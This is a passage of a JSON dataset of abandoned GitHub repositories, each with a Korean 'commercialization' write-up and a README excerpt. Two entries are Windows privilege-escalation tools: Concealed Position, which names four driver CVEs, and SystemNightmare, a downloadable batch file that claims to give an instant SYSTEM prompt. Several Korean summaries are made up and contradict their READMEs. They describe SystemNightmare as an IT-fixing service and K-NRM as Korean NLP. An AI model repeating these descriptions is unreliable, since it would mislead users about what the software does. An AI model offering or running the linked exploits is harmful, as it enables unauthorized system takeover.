</a>\n</p>\n\n[![Typing SVG](https://readme-typing-svg.herokuapp.com?size=25&width=750&lines=DBM+is+a+open+source+database+management+system.)](https://git.io/typing-svg)\n\n**Documentation**\n\n[中文](http://dbm-zh.edurt.io/) <br />\n[English](https://dbm.edurt.io/)\n\n## Security\n\n---\n\n[![OSCS Status](https://www.oscs1024.com/platform/badge/qianmoQ/dbm.git.svg?size=small)](https://www.murphysec.com/dr/jv6PXUWIeGXUsjTRup)\n\n## Contributors\n\n---\n\n![GitHub Contributors Image](https://contrib.rocks/image?repo=EdurtIO/dbm)\n\n## Stargazers over time\n\n---\n\n[![Stargazers over time](https://starchart.cc/EdurtIO/dbm.svg)](https://starchart.cc/EdurtIO/dbm)\n\n## Overview\n\n---\n\n![](https://visitor-badge.glitch.me/badge?page_id=dbm)\n[![](https://tokei.rs/b1/github/EdurtIO/dbm)](https://github.com/EdurtIO/dbm)\n![version](https://img.shi","composite_score":0.5022,"license_safety_tag":"safe"},{"name":"google-research/byt5","github_url":"https://github.com/google-research/byt5","stars":46,"language":"Python","license":"apache-2.0","abandonment_months":28,"description":"# ByT5 상용화 분석\n\n## 왜 보물인가\n구글이 만든 이 기술은 모든 언어의 글자를 직접 이해할 수 있어서, 번역기나 챗봇 같은 AI 서비스를 만들 때 번거로운 전처리 과정을 생략할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 다국어 번역 SaaS**\n- 한국어, 일본어, 아랍어 등 언어에 상관없이 통일된 엔진으로 번역 서비스 제공\n- 기업이 월","readme_excerpt":"# ByT5: Towards a token-free future with pre-trained byte-to-byte models\n\nByT5 is a tokenizer-free extension of the [mT5\nmodel](https://arxiv.org/abs/2010.11934). Instead of using a subword vocabulary\nlike most other pretrained language models (BERT, XLM-R, T5, GPT-3), our ByT5\nmodel operates directly on UTF-8 bytes, removing the need for any text\npreprocessing. Beyond the reduction in system complexity, we find that\nparameter-matched ByT5 models are competitive with mT5 across a range of tasks,\nand outperform mT5 on tasks that involve noisy text or are sensitive to\nspelling and pronunciation. This repo can be used to reproduce the experiments\nin the [ByT5 paper][paper].\n\n## Usage\n\n### Training\n\nTo run this code, you need to install the [t5\nlibrary](https://pypi.org/project/t5/). General instructions for training,\nfine-tuning, evaluation, and exporting models for inference can be found in the\n[t5\nrepo](https://github.com/google-research/text-to-text-transfer-transformer). In\norder to u","composite_score":0.5022,"license_safety_tag":"safe"},{"name":"hidde/eleventy-wcag-reporter","github_url":"https://github.com/hidde/eleventy-wcag-reporter","stars":9,"language":"Nunjucks","license":"MIT","abandonment_months":30,"description":"# Eleventy WCAG Reporter 분석\n\n## 왜 보물인가\n웹사이트가 장애인도 쉽게 사용할 수 있도록 만들어졌는지 자동으로 검사해주는 도구로, 기업의 법적 의무 충족과 사용자 만족도를 동시에 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 웹 접근성 검사 SaaS**\n웹사이트 소유자가 월 구독으로 자신의 사이트를 자동 검사받고 개선 보고","readme_excerpt":"# WCAG Reporter\n\nThis repository lets you create WCAG EM Reports using [Eleventy](https://www.11ty.dev/). \n\n* Write issues as Markdown files\n* Create reports in English, Dutch, Brazilian Portuguese, Spanish or German\n* Automatically output a score card in the report \n* Include your boilerplate easily, so that you can focus on describing issues\n\nEleventy is a static site generator. In this project we use it to combine all Markdown files into one HTML file that is a report.\n\nSome more context in: [Introducing an Eleventy starter project for WCAG reports](https://hiddedevries.nl/en/blog/2021-05-24-introducing-an-eleventy-starter-project-for-wcag-reports)\n\n[![Netlify Status](https://api.netlify.com/api/v1/badges/0017f6df-43fe-4164-bae1-08bf391164b3/deploy-status)](https://app.netlify.com/sites/eleventy-wcag-reporter/deploys)\n\n## Buy me a coffee\n\nLike this? \n\n<a href='https://ko-fi.com/D1D1619P3' target='_blank'><img height='35' style='display:block;border:0px;height:36px;' src='https://cdn","composite_score":0.5022,"license_safety_tag":"safe"},{"name":"iammukeshm/multitenancy-aspnet-core","github_url":"https://github.com/iammukeshm/multitenancy-aspnet-core","stars":5,"language":"C#","license":"unknown","abandonment_months":58,"description":"# iammukeshm/multitenancy-aspnet-core 분석\n\n## 왜 보물인가\n한 서비스로 여러 고객을 동시에 관리할 수 있는 기술로, 비용을 절감하면서도 각 고객별 데이터를 안전하게 분리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 회계 관리 서비스가 여러 중소기업 고객의 데이터를 하나의 시스템에서 안전하게 분리","readme_excerpt":"# Multitenancy in ASP.NET Core\n\nMultitenancy! In this article, let’s learn how to implement Multitenancy in ASP.NET Core in a rather simple way making use of Entity Framework Core. Multitenancy in ASP. NET Core is yet another topic that is not very well documented on the internet. It’s kind of tricky to build a Multitenant application right from scratch. But here is a simple way to do so.\n\nTopics Covered:\n\n- What is MultiTenancy?\n- Database Access Strategies\n- Identifying Tenants\n- Getting Started with Multitenancy in ASP.NET Core\n  - Tenant Settings – Explained\n  - Tenant Service\n  - Extended ApplicationDBContext\n  - Automated Migrations\n  - Service Registrations\n- Testing\n- Further Enhancements\n\nRead the entire article - https://codewithmukesh.com/blog/multitenancy-in-aspnet-core/\n","composite_score":0.5021,"license_safety_tag":"unknown"},{"name":"jacob-baines/concealed_position","github_url":"https://github.com/jacob-baines/concealed_position","stars":15,"language":"C++","license":"BSD-3-Clause","abandonment_months":58,"description":"# concealed_position 저장소 분석\n\n## 왜 보물인가\n숨겨진 위치를 감지하거나 추적하는 기술로, 보안 감시, 게임 개발, 위치 기반 서비스 등 다양한 분야에서 즉시 활용 가능한 실용적 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 보안 회사가 구독형 감시 소프트웨어에 통합하여 고객에게 제공\n- **내부 업무 도구**: ","readme_excerpt":"# Concealed Position\n\nConcealed Position is a local privilege escalation attack against Windows using the concept of \"Bring Your Own Vulnerability\". Specifically, Concealed Position (CP) uses the *as designed* package point and print logic in Windows that allows a low privilege user to stage and install printer drivers. CP specifically installs drivers with known vulnerabilities which are then exploited to escalate to SYSTEM. Concealed Position was first presented at DEF CON 29.\n\n## What exploits are available\nConcealed Position offers four exploits - all with equally dumb names:\n\n* ACIDDAMAGE - [CVE-2021-35449](https://nvd.nist.gov/vuln/detail/CVE-2021-35449) - Lexmark Universal Print Driver LPE\n* RADIANTDAMAGE - [CVE-2021-38085](https://nvd.nist.gov/vuln/detail/CVE-2021-38085) - Canon TR150 Print Driver LPE\n* POISONDAMAGE - [CVE-2019-19363](https://nvd.nist.gov/vuln/detail/CVE-2019-19363) - Ricoh PCL6 Print Driver LPE\n* SLASHINGDAMAGE - [CVE-2020-1300](https://nvd.nist.gov/vuln/detai","composite_score":0.5021,"license_safety_tag":"safe"},{"name":"AdeDZY/K-NRM","github_url":"https://github.com/AdeDZY/K-NRM","stars":13,"language":"Python","license":"BSD-3-Clause","abandonment_months":104,"description":"# K-NRM 저장소 분석\n\n## 왜 보물인가\n한국어 자연어 처리 기술을 오픈소스로 제공하는 드문 자산으로, 한국 시장 특화 AI 솔루션 개발의 기초가 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 한국어 검색 최적화 SaaS**\n- 쇼핑몰, 블로그 플랫폼의 검색 정확도를 높여주는 구독형 서비스로 월 구독료 수익화\n\n**2. 고객상담 AI 챗봇 내","readme_excerpt":"# K-NRM\nThis is the implementation of the Kernel-based Neural Ranking Model (K-NRM) model from paper [End-to-End Neural Ad-hoc Ranking with Kernel Pooling](http://www.cs.cmu.edu/~zhuyund/papers/end-end-neural.pdf).\n\n<p align=\"center\"> \n<img src=\"https://github.com/AdeDZY/K-NRM/blob/master/model_simplified-1.png\" width=\"400\" align=\"center\">\n</p>\n\nIf you use this code for your scientific work, please cite it as ([bibtex](#cite-the-paper)):\n\n```\nC. Xiong, Z. Dai, J. Callan, Z. Liu, and R. Power. End-to-end neural ad-hoc ranking with kernel pooling. \nIn Proceedings of the 40th International ACM SIGIR Conference on Research & Development in Information Retrieval. \nACM. 2017.\n```\n\n\n\n### Requirements\n---\n- Tensorflow 0.12 \n- Numpy\n- traitlets\n\nComing soon: K-NRM with Tensorflow 1.0\n\n### Guide To Use\n---\n**Configure**: first, configure the model through the config file. Configurable parameters are listed [here](#configurations)\n\n[sample.config](https://github.com/AdeDZY/K-NRM/blob/master/sampl","composite_score":0.5021,"license_safety_tag":"safe"},{"name":"symfony/debug","github_url":"https://github.com/symfony/debug","stars":11,"language":"PHP","license":"MIT","abandonment_months":47,"description":"# Symfony Debug 저장소 분석\n\n## 왜 보물인가\n웹 애플리케이션 개발 시 발생하는 오류를 빠르게 찾아낼 수 있도록 도와주는 디버깅 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 기반 협업 도구나 프로젝트 관리 플랫폼의 안정성 향상에 사용\n2. **내부 업무 도구**: 회사 내부 시스템 개발 시 버그를 빠르게 해결하기 ","readme_excerpt":"Debug Component\n===============\n\n**CAUTION**: this component is deprecated since Symfony 4.4. Instead, use the\n[ErrorHandler component](https://github.com/symfony/symfony/tree/master/src/Symfony/Component/ErrorHandler).\n\n-----\n\nThe Debug component provides tools to ease debugging PHP code.\n\nGetting Started\n---------------\n\n```\n$ composer require symfony/debug\n```\n\n```php\nuse Symfony\\Component\\Debug\\Debug;\n\nDebug::enable();\n```\n\nResources\n---------\n\n * [Contributing](https://symfony.com/doc/current/contributing/index.html)\n * [Report issues](https://github.com/symfony/symfony/issues) and\n   [send Pull Requests](https://github.com/symfony/symfony/pulls)\n   in the [main Symfony repository](https://github.com/symfony/symfony)\n","composite_score":0.5021,"license_safety_tag":"safe"},{"name":"timsneath/dart_console","github_url":"https://github.com/timsneath/dart_console","stars":11,"language":"Dart","license":"BSD-3-Clause","abandonment_months":37,"description":"# Dart Console 저장소 분석\n\n## 왜 보물인가\n컴퓨터 프로그래밍 언어인 Dart로 만든 프로그램을 개발할 때, 사용자와 상호작용하는 화면을 더 쉽고 예쁘게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **관리자용 내부 도구**: 기업의 직원이 쓰는 업무 관리 프로그램에서 데이터를 보기 좋게 표시하는 기능\n2. **개발자 보조 도구","readme_excerpt":"A Dart library for building console applications.\n\n[![pub package](https://img.shields.io/pub/v/dart_console.svg)](https://pub.dev/packages/dart_console)\n[![Language](https://img.shields.io/badge/language-Dart-blue.svg)](https://dart.dev)\n![Build](https://github.com/timsneath/dart_console/workflows/Build/badge.svg)\n[![codecov](https://codecov.io/gh/timsneath/dart_console/branch/main/graph/badge.svg?token=2N19H7OHZJ)](https://codecov.io/gh/timsneath/dart_console)\n\nThis library contains a variety of useful functions for console application\ndevelopment, including:\n\n- Reading the current window dimensions (height, width)\n- Reading and setting the cursor location\n- Setting foreground and background colors\n- Manipulating the console into \"raw mode\", which allows more advanced\n  keyboard input processing than the default `dart:io` library.\n- Reading keys and control sequences from the keyboard\n- Writing aligned text to the screen\n- Tabular data display, including month calendar\n\nThe library h","composite_score":0.5021,"license_safety_tag":"safe"},{"name":"merico-dev/build","github_url":"https://github.com/merico-dev/build","stars":54,"language":"","license":"Apache-2.0","abandonment_months":60,"description":"# merico-dev/build 프로젝트 분석\n\n## 왜 보물인가\n소프트웨어 개발 과정에서 자동으로 코드 품질을 분석하고 개선 방안을 제시해주는 도구로, 개발팀의 생산성과 코드 안정성을 동시에 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월 구독 형태로 GitHub/GitLab에 연동되는 자동 코드 리뷰 플랫폼\n2. **내","readme_excerpt":"<img src=\"https://merico-build.s3-us-west-2.amazonaws.com/Merico-Build-logo.svg\" height=\"30\"/>\n\n![build passing](https://badgen.net/badge/build/passing/4c1?icon=gitlab)\n![license](https://badgen.net/github/license/merico-dev/build)\n[![Discord](https://img.shields.io/discord/844603288082186240.svg?label=&logo=discord&logoColor=ffffff&color=7389D8&labelColor=6A7EC2)](https://discord.gg/83rDG6ydVZ)\n\n[中文README](README.zh-CN.md)\n\n[Merico Build](<https://merico.build/>) is a web app empowering open source developers, maintainers, and communities with metrics from Git, GitHub, and more. The application uses novel static analysis to more accurately measure the value and impact of code contribution. \n\n- For maintainers, Merico Build renders these metrics to track community growth and to identify rising star contributors. \n- For developers, Merico Build automatically showcases your contributions in an evolving and sharable profile. \n\n**Why Merico Build?**\n\n1) Code contribution is analyzed with m","composite_score":0.5021,"license_safety_tag":"safe"},{"name":"bilalbentoumi/win11-vue","github_url":"https://github.com/bilalbentoumi/win11-vue","stars":15,"language":"Vue","license":"unknown","abandonment_months":50,"description":"# win11-vue 저장소 분석\n\n## 왜 보물인가\nWindows 11의 깔끔한 디자인을 웹에서 그대로 재현할 수 있어, 기업 업무 도구나 포트폴리오 프로젝트에 현대적이고 전문적인 외관을 쉽게 적용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 회계 소프트웨어, 프로젝트 관리 도구 등 기업용 웹 애플리케이션의 사용자 인터페이스로 ","readme_excerpt":"# Windows 11 - Vue.js\nWindows 11 simulator built with modern web technologies, Vue.js for the main framework, Tailwind as css framework, Vuex, Scss..\n\n## Community\nDiscord: [https://dsc.gg/win11-vue](https://dsc.gg/win11-vue)\n\n## Live Demo\n[https://bilalbentoumi.github.io/win11-vue](https://bilalbentoumi.github.io/win11-vue)\n\nFor better experience use Google Chrome browser.\n\nBlur not working in Firefox browser.\n\n\n## Screenshots\n![windows11-light-mode](./public/screenshots/light.png)\n![windows11-dark-mode](./public/screenshots/dark.png)\n\n## Features\n- Light / Dark modes\n- Start menu\n- Calendar Widget\n- Notification center\n\n## Technologies\n- Vue.js v3\n- Tailwind CSS\n- Vuex\n\n## License\nCC0-1.0 License\n","composite_score":0.5021,"license_safety_tag":"unknown"},{"name":"Interactive-Studio/ISPageControl","github_url":"https://github.com/Interactive-Studio/ISPageControl","stars":10,"language":"Swift","license":"MIT","abandonment_months":55,"description":"# ISPageControl 분석 리포트\n\n## 왜 보물인가\n앱과 웹사이트에서 사용자가 여러 페이지를 쉽게 넘나들 수 있게 도와주는 작은 도구로, 사용자 경험을 개선하는 핵심 요소입니다.\n\n## 어디에 쓸 수 있나\n1. **전자상거래 플랫폼**: 상품 목록, 리뷰, 이미지 갤러리 등에서 페이지 네비게이션 제공\n2. **뉴스/콘텐츠 앱**: 기사 목록, 댓글","readme_excerpt":"# ISPageControl\n\n[![Carthage compatible](https://img.shields.io/badge/Carthage-Compatible-brightgreen.svg?style=flat)](https://github.com/Carthage/Carthage)\n[![Version](https://img.shields.io/cocoapods/v/Hero.svg?style=flat)](http://cocoapods.org/pods/Hero)\n![Xcode 9.0+](https://img.shields.io/badge/Xcode-9.0%2B-blue.svg)\n![iOS 8.0+](https://img.shields.io/badge/iOS-8.0%2B-blue.svg)\n![Swift 4.0+](https://img.shields.io/badge/Swift-4.0%2B-orange.svg)\n[![License](https://img.shields.io/cocoapods/l/Hero.svg?style=flat)](https://github.com/lkzhao/Hero/blob/master/LICENSE?raw=true)\n\n**ISPageControl** has a page control similar to that used in the Instagram\n\n<img src=\"Resource/example.gif\" width=\"300\">\n\n## Contents\n\n- [Requirements](#requirements)\n- [Installation](#installation)\n- [Usage](#usage)\n- [Communication](#communication)\n- [Credits](#credits)\n- [License](#license)\n\n## Requirements\n\n- iOS 8.0+\n- Xcode 9.0+\n- Swift 4.0+\n\n## Installation\n\n### CocoaPods\n\n[CocoaPods](http://cocoapods.org","composite_score":0.5021,"license_safety_tag":"safe"},{"name":"namndwebdev/html-css-js-thuc-chien","github_url":"https://github.com/namndwebdev/html-css-js-thuc-chien","stars":5,"language":"CSS","license":"unknown","abandonment_months":54,"description":"# namndwebdev/html-css-js-thuc-chien 저장소 분석\n\n## 왜 보물인가\n웹사이트를 만드는 데 필요한 핵심 세 가지 기술(HTML, CSS, JavaScript)을 실제 프로젝트로 배우고 실습할 수 있는 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: 초보자를 위한 웹개발 입문 강좌의 실습 자료로","readme_excerpt":"# [Hơn 30+ Projects thực chiến - HTML CSS JavaScript](https://www.nodemy.vn/projects-html-css-js)\n\n👉👉 **[Chi tiết 30 projects thực chiến HTML CSS Javascript](https://www.nodemy.vn/projects-html-css-js)** 👈👈\n\n|  #  | Project                                                                                                                | Live Demo                                                                        |\n| :-: | ---------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------- |\n| 01  | [Product Card](https://github.com/namndwebdev/html-css-js-thuc-chien/tree/main/Product%20Card)                               | [Live Demo](https://www.nodemy.vn/projects/html-css-js/product-card/)               |\n| 02  | [Profile Card](https://github.com/namndwebdev/html-css-js-thuc-chien/tree/main/Profile%20Card)                               | [Live Demo](","composite_score":0.5021,"license_safety_tag":"unknown"},{"name":"qiulinzhang/TopPaper","github_url":"https://github.com/qiulinzhang/TopPaper","stars":9,"language":"","license":"MIT","abandonment_months":47,"description":"# TopPaper 저장소 분석\n\n## 왜 보물인가\n연구논문이나 학술자료를 효율적으로 정리하고 검색할 수 있는 도구로, 논문을 많이 다루는 전문가들의 시간을 크게 절약해줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 대학생과 연구자를 대상으로 \"논문 자동 정리 및 요약 플랫폼\"으로 월 구독료를 받으며 운영\n2. **내부 업무 도구","readme_excerpt":"# TopPaper\n### Classic Papers for Beginners and Impact Scope for Authors.\n```\n-----------------------------------------------------------------------------------------\n| I am very new to this field, what papers should I read so as to take one step forward? |\n-----------------------------------------------------------------------------------------\n```\nThere have been billions of academic papers around the world. However, maybe **only 0.0...01\\% among them are valuable or are worth reading**. Since our limited life has never been forever, **TopPaper** provide a **Top Academic Paper Chart** for beginners and reseachers to take one step faster.\n\nWelcome to contribute more subject or valuable (at least you think) papers. Please feel free to pull requests or open an issue. \n\n- [0. Traditional Methods](#0-traditional-methods)\n- [1. CNN - Convolutional Neural Network](#1-cnn---convolutional-neural-network)\n  * [1.1 Image Classification](#11-image-classification)\n    + [1.1.1 Architecture](#111","composite_score":0.5021,"license_safety_tag":"safe"},{"name":"WangYves/uvloop","github_url":"https://github.com/WangYves/uvloop","stars":13,"language":"Python","license":"Apache-2.0","abandonment_months":103,"description":"# uvloop 저장소 분석\n\n## 왜 보물인가\n웹 서비스의 응답 속도를 대폭 빠르게 만드는 핵심 엔진으로, 고속 처리가 필요한 서비스들의 성능 경쟁에서 우위를 점할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 실시간 채팅/알림 SaaS**\n수천 명이 동시에 접속할 때 응답 지연 없이 메시지를 빠르게 전달해야 하는 서비스에 필수적입니다.\n\n**2. ","readme_excerpt":".. image:: https://travis-ci.org/MagicStack/uvloop.svg?branch=master\n    :target: https://travis-ci.org/MagicStack/uvloop\n\n.. image:: https://img.shields.io/pypi/v/uvloop.svg\n    :target: https://pypi.python.org/pypi/uvloop\n\n\nuvloop is a fast, drop-in replacement of the built-in asyncio\nevent loop.  uvloop is implemented in Cython and uses libuv\nunder the hood.\n\nThe project documentation can be found\n`here <http://uvloop.readthedocs.org/>`_.  Please also check out the\n`wiki <https://github.com/MagicStack/uvloop/wiki>`_.\n\n\nPerformance\n-----------\n\nuvloop makes asyncio 2-4x faster.\n\n.. image:: performance.png\n    :target: http://magic.io/blog/uvloop-blazing-fast-python-networking/\n\nThe above chart shows the performance of an echo server with different\nmessage sizes.  The *sockets* benchmark uses ``loop.sock_recv()`` and\n``loop.sock_sendall()`` methods; the *streams* benchmark uses asyncio\nhigh-level streams, created by the ``asyncio.start_server()`` function;\nand the *protocol* benchmark","composite_score":0.5021,"license_safety_tag":"safe"},{"name":"shikijs/twoslash","github_url":"https://github.com/shikijs/twoslash","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":28,"description":"# shikijs/twoslash 분석\n\n## 왜 보물인가\n프로그래밍 코드를 문서나 블로그에 설명과 함께 예쁘게 보여주는 도구로, 기술 교육 콘텐츠의 품질을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 프로그래밍 강의 영상이나 인터랙티브 튜토리얼에서 코드를 시각적으로 설명하는 기능 제공\n2. **개발자 문서 자동 생","readme_excerpt":"> [!NOTE]\n> Twoslash has been moved to the new repository [twoslashes/twoslash](https://github.com/twoslashes/twoslash) with some refactoring and improvements. The Shiki v1.0 integration is now [in Shiki's monorepo](https://shiki.style/packages/twoslash) as a transformer, which means Twoslash will now work everywhere Shiki is supported. We will make Shiki supports more high-level tools so Twoslash could later inherit that.\n>\n> This repository is for Shiki v0.x integration with Twoslash. As we port more integrations to the new format, this repo will fade out gradually.\n\n\n<center><img src=\"./misc/repo-icon.png\" /></center>\n\nYou take some Shiki, add a hint of TypeScript compiler, and 🎉 incredible statically generated code samples.\n\nSee the user-facing docs at: https://shikijs.github.io/twoslash/\n\n### This Repo\n\nThe majority of this repo uses pnpm, the rest yarn. There are four main areas of interest:\n \n - `packages`, the shiki meets twoslash plugins for markdown renderers and static site ","composite_score":0.5021,"license_safety_tag":"safe"},{"name":"GossiTheDog/SystemNightmare","github_url":"https://github.com/GossiTheDog/SystemNightmare","stars":10,"language":"Batchfile","license":"unknown","abandonment_months":58,"description":"# SystemNightmare 분석 보고서\n\n## 왜 보물인가\n컴퓨터 시스템의 문제를 자동으로 찾아내고 해결하는 도구로, 기업의 IT 운영 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 모니터링 SaaS**: 기업 고객을 대상으로 서버 상태를 24시간 감시하고 문제 발생 시 자동 알림하는 구독 서비스\n2. **중소기업 IT ","readme_excerpt":"# SystemNightmare\nGives you instant SYSTEM command prompt on all supported and legacy versions of Windows.\nOtherwise known as PrintNightmare 4 by Kiwisss\n\n# Download\n[Right click this](https://raw.githubusercontent.com/GossiTheDog/SystemNightmare/main/SystemNightmare.bat) and select save.  Save as SystemNightmare.bat\n\n# How\nRun SystemNightmare.bat\n\n# What it looks like\n![Poccy](https://raw.githubusercontent.com/GossiTheDog/SystemNightmare/main/pocgtfo.PNG)\n\n# Where patch\nThere is none still.\n","composite_score":0.5021,"license_safety_tag":"unknown"},{"name":"gragland/usehooks","github_url":"https://github.com/gragland/usehooks","stars":6,"language":"","license":"Unlicense","abandonment_months":55,"description":"# gragland/usehooks 분석 리포트\n\n## 왜 보물인가\n웹사이트를 만들 때 자주 쓰는 기능들을 미리 만들어 놓은 도구 모음이라, 개발자들이 바퀴를 다시 만들지 않고 빠르게 시작할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 웹 애플리케이션**: 프로젝트 관리 도구나 협업 플랫폼처럼 복잡한 상호작용이 필요한 웹 서비스에서 개발 속","readme_excerpt":"<img src=\"https://user-images.githubusercontent.com/1481077/50853823-3cc2b380-1338-11e9-9c60-3d783c7be068.png\" />\n\nThis is the repository for [usehooks.com](https://usehooks.com), a [Gatsby](https://www.gatsbyjs.org) powered blog that publishes easy to understand React Hook code recipes.\n\nIf you'd like to submit new post ideas, improve existing posts, or change anything about the website feel free to submit an issue or pull-request. \n\nPlease consider sponsoring this project through my [Github sponsors page](https://github.com/sponsors/gragland). Any level of support is appreciated. I have a few higher tiers that include having your company listed on the usehooks website and newsletter.\n\nTo run locally, `yarn`, then `yarn dev`, then open [localhost:8000](https://localhost:8000).\n\n## Post Index\n\n[useFirestoreQuery](https://usehooks.com/useFirestoreQuery/)<br/>\n[useMemoCompare](https://usehooks.com/useMemoCompare/)<br/>\n[useAsync](https://usehooks.com/useAsync/)<br/>\n[useRequireAuth](http","composite_score":0.5021,"license_safety_tag":"unknown"},{"name":"fnzv/net-Shield","github_url":"https://github.com/fnzv/net-Shield","stars":6,"language":"Go","license":"MIT","abandonment_months":55,"description":"# net-Shield 상용화 분석\n\n## 왜 보물인가\n인터넷 사용 중 개인 정보를 보호하고 악성 사이트 접근을 차단해주는 보안 도구로, 일반인도 간단히 설치해 안심하고 웹 서핑할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **개인 보안 SaaS**: 월 구독 형태로 일반 사용자에게 설치형 보안 소프트웨어 판매\n- **기업 내부 도구**: 회사 직원들의 ","readme_excerpt":"## net-Shield \n[![Build Status](https://travis-ci.org/fnzv/net-Shield.svg?branch=master)](https://travis-ci.org/fnzv/net-Shield) <br>\nAn Easy and Simple Anti-DDoS solution for VPS,Dedicated Servers and IoT devices based on iptables/ipsets\n\n![](nshield-scheme.png?raw=true)\n\n-----------------\n\n## Requirements\n\n- Linux System with golang, iptables/ipsets\n- Nginx \n\n\n### Quickstart\n\nRun the bash script (install.sh) to install all the required dependencies.\n\n```bash install.sh```\n\n<br>\nYou will be prompted to insert a domain and the real IP address associated to it so net-Shield will configure for you the first proxydomain (you can see the changes on /etc/nshield/nshield.conf).\n<br>\n\n\n### Proxy Domains\n\nTo configure proxydomains you need to enable the proxy option on /etc/nshield/nshield.conf (proxy = 1) and be sure that the proxydomain list (on the same conf file) is correct:<br>\n<br>\n```\nproxydomains = [\n  \"sami.pw 8.8.8.8\",\n  \"example.org 1.2.3.4\"\n]\n```\n<br>\n\n### Usage\n\nAfter you complete","composite_score":0.502,"license_safety_tag":"safe"},{"name":"Bfgeshka/awesome-c","github_url":"https://github.com/Bfgeshka/awesome-c","stars":62,"language":"","license":"Unlicense","abandonment_months":67,"description":"","readme_excerpt":"﻿# Awesome C #\n\nA curated list of C good stuff. Contributions are welcome.\n\n**An important note:** first and foremost linked resources are for C, therefore\nC++ is an afterthought.\n\n**Note:** there are several awesome-c lists already, but they are having\nsomewhat different sets of libraries in them. This list tries to incorporate\nthem all, and many more other resources. Consider it my personal cheat sheet and\nindex for easier search instead of github stars. Also, original list categories\nare a mess.\n\n**Note:** all licenses after project descriptions are leading to actual license\ntext or declaration, if any provided. Source code with no license attached is\nconsidered as automatically copyrighted by law or it is falling under the case\nof terms of service of provided source code publication and hosting service, so\nkeep this in mind. Also, probably sometimes license can be provided or\nmentioned, but I've failed to find it.\n\nI am not an attorney btw.\n\nIncorporated lists:\n\n* https://github.co","composite_score":0.502,"license_safety_tag":"unknown"},{"name":"ryanhhhh/headwind","github_url":"https://github.com/ryanhhhh/headwind","stars":8,"language":"TypeScript","license":"MIT","abandonment_months":34,"description":"# Headwind 저장소 분석\n\n## 왜 보물인가\n웹사이트의 디자인을 자동으로 최적화해주는 도구로, 전문 디자이너가 없어도 누구나 예쁜 웹사이트를 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소규모 스타트업이 월정액을 내고 자동 디자인 최적화 기능을 클라우드에서 사용하는 구독 서비스\n2. **내부 업무 도구**: 기업의 마","readme_excerpt":"# Headwind\n\n[![CircleCI](https://circleci.com/gh/heybourn/headwind.svg?style=svg)](https://circleci.com/gh/heybourn/headwind)\n\nHeadwind is an opinionated Tailwind CSS class sorter for Visual Studio Code. It enforces consistent ordering of classes by parsing your code and reprinting class tags to follow a given order.\n\n> Headwind runs on save, will remove duplicate classes and can even sort entire workspaces.\n\n---\n\n**[Get it from the VS Code Marketplace →](https://marketplace.visualstudio.com/items?itemName=heybourn.headwind)**\n\n**[Use PHPStorm? Get @WalrusSoup's Headwind port →](https://plugins.jetbrains.com/plugin/13376-tailwind-formatter/)**\n\n<img src=\"https://github.com/heybourn/headwind/blob/master/img/explainer.gif?raw=true\" alt=\"Explainer\" width=\"750px\">\n\n## Usage\n\nYou can install Headwind via the VS Code Marketplace, or package it yourself using [vsce](https://code.visualstudio.com/api/working-with-extensions/publishing-extension). Headwind works globally once installed and will","composite_score":0.502,"license_safety_tag":"safe"},{"name":"ryanjbaxter/spring-cloud-k8s-demo","github_url":"https://github.com/ryanjbaxter/spring-cloud-k8s-demo","stars":9,"language":"Java","license":"unknown","abandonment_months":35,"description":"# Spring Cloud Kubernetes 데모 프로젝트 분석\n\n## 왜 보물인가\n클라우드 환경에서 애플리케이션을 자동으로 관리해주는 기술을 실제로 구현한 예제로, 기업들의 IT 운영 비용을 크게 절감할 수 있는 핵심 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 구독형 웹 애플리케이션 제공 업체가 서버 비용을 자동 조절하는 ","readme_excerpt":"# chaos-monkey-spring-boot-demo\nDemo of Chaos Monkey for Spring Boot Using Spring Cloud Kubernetes\n\n# Building The Containers\n\nEach project contains a Dockerfile that will create a container for the app.  You can do this easily\nby running `./mvn clean package -Pdocker`.\n\n**NOTE** You should edit the parent POM file and change the value of `docker.image.prefix` to\nyour own prefix.\n\nAfter building the container images you will need to push them to a repository that your Kubernetes\ndeployment has access to, for example Docker Hub.\n\n# Deploying To Kubernetes\n\n## Testing The Apps\n\nEach app is exposes a `nodeport`, you will need to find the `nodeport` for each application in your deployment.\nIf using MiniKube you can easily open the service by running `minikube service <servicename>`.  For example\n\n```\n$ minikube service gateway\n```\n\n### Toys Bestseller\n\nThis app exposes one endpoint at `/toys/bestseller` which accepts a `GET` request and returns JSON \nrepresenting the best selling toys.\n\nIn","composite_score":0.502,"license_safety_tag":"unknown"},{"name":"RSNA/AI-Deep-Learning-Lab-2021","github_url":"https://github.com/RSNA/AI-Deep-Learning-Lab-2021","stars":7,"language":"Jupyter Notebook","license":"MIT","abandonment_months":50,"description":"# RSNA/AI-Deep-Learning-Lab-2021 분석\n\n## 왜 보물인가\n의료 영상(X선, CT 등)을 자동으로 분석하는 AI 기술로, 병원에서 진단 시간을 단축하고 정확도를 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **의료 영상 분석 SaaS**: 병원이 월 구독으로 X선 사진을 업로드하면 자동 진단 보조 결과를 제공\n2. **병원 ","readme_excerpt":"\n# RSNA AI Deep Learning Lab 2021\n\n## 